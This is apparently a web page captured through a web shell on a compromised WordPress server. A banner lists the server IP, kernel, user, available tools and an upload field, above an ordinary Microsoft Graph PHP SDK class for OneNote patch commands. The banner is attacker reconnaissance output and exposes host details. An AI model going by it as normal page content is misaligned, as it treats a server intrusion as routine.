Warning: chmod(): Operation not permitted in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [0] in function chmod in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [1] in function include_once in /var/www/hopeinstoughton_www/wp-settings.php on line 560 [2] in function require_once in /var/www/hopeinstoughton_www/wp-config.php on line 85 [3] in function require_once in /var/www/hopeinstoughton_www/wp-load.php on line 50 [4] in function require_once in /var/www/hopeinstoughton_www/wp-blog-header.php on line 13 [5] in function require in /var/www/hopeinstoughton_www/index.php on line 17
| Server IP : 94.177.8.99 / Your IP : 216.73.217.165 Web Server : Apache/2.4.58 (Ubuntu) System : Linux aries 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64 User : www-data ( 33) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /proc/thread-self/cwd/vendor/microsoft/microsoft-graph/src/Model/ |
Upload File : |
<?php
/**
* Copyright (c) Microsoft Corporation. All Rights Reserved. Licensed under the MIT License. See License in the project root for license information.
*
* OnenotePatchContentCommand File
* PHP version 7
*
* @category Library
* @package Microsoft.Graph
* @copyright (c) Microsoft Corporation. All rights reserved.
* @license https://opensource.org/licenses/MIT MIT License
* @link https://graph.microsoft.com
*/
namespace Microsoft\Graph\Model;
/**
* OnenotePatchContentCommand class
*
* @category Model
* @package Microsoft.Graph
* @copyright (c) Microsoft Corporation. All rights reserved.
* @license https://opensource.org/licenses/MIT MIT License
* @link https://graph.microsoft.com
*/
class OnenotePatchContentCommand extends Entity
{
/**
* Gets the action
* The action to perform on the target element. The possible values are: replace, append, delete, insert, or prepend.
*
* @return OnenotePatchActionType|null The action
*/
public function getAction()
{
if (array_key_exists("action", $this->_propDict)) {
if (is_a($this->_propDict["action"], "\Microsoft\Graph\Model\OnenotePatchActionType") || is_null($this->_propDict["action"])) {
return $this->_propDict["action"];
} else {
$this->_propDict["action"] = new OnenotePatchActionType($this->_propDict["action"]);
return $this->_propDict["action"];
}
}
return null;
}
/**
* Sets the action
* The action to perform on the target element. The possible values are: replace, append, delete, insert, or prepend.
*
* @param OnenotePatchActionType $val The value to assign to the action
*
* @return OnenotePatchContentCommand The OnenotePatchContentCommand
*/
public function setAction($val)
{
$this->_propDict["action"] = $val;
return $this;
}
/**
* Gets the content
* A string of well-formed HTML to add to the page, and any image or file binary data. If the content contains binary data, the request must be sent using the multipart/form-data content type with a 'Commands' part.
*
* @return string|null The content
*/
public function getContent()
{
if (array_key_exists("content", $this->_propDict)) {
return $this->_propDict["content"];
} else {
return null;
}
}
/**
* Sets the content
* A string of well-formed HTML to add to the page, and any image or file binary data. If the content contains binary data, the request must be sent using the multipart/form-data content type with a 'Commands' part.
*
* @param string $val The value of the content
*
* @return OnenotePatchContentCommand
*/
public function setContent($val)
{
$this->_propDict["content"] = $val;
return $this;
}
/**
* Gets the position
* The location to add the supplied content, relative to the target element. The possible values are: after (default) or before.
*
* @return OnenotePatchInsertPosition|null The position
*/
public function getPosition()
{
if (array_key_exists("position", $this->_propDict)) {
if (is_a($this->_propDict["position"], "\Microsoft\Graph\Model\OnenotePatchInsertPosition") || is_null($this->_propDict["position"])) {
return $this->_propDict["position"];
} else {
$this->_propDict["position"] = new OnenotePatchInsertPosition($this->_propDict["position"]);
return $this->_propDict["position"];
}
}
return null;
}
/**
* Sets the position
* The location to add the supplied content, relative to the target element. The possible values are: after (default) or before.
*
* @param OnenotePatchInsertPosition $val The value to assign to the position
*
* @return OnenotePatchContentCommand The OnenotePatchContentCommand
*/
public function setPosition($val)
{
$this->_propDict["position"] = $val;
return $this;
}
/**
* Gets the target
* The element to update. Must be the #&lt;data-id&gt; or the generated &lt;id&gt; of the element, or the body or title keyword.
*
* @return string|null The target
*/
public function getTarget()
{
if (array_key_exists("target", $this->_propDict)) {
return $this->_propDict["target"];
} else {
return null;
}
}
/**
* Sets the target
* The element to update. Must be the #&lt;data-id&gt; or the generated &lt;id&gt; of the element, or the body or title keyword.
*
* @param string $val The value of the target
*
* @return OnenotePatchContentCommand
*/
public function setTarget($val)
{
$this->_propDict["target"] = $val;
return $this;
}
}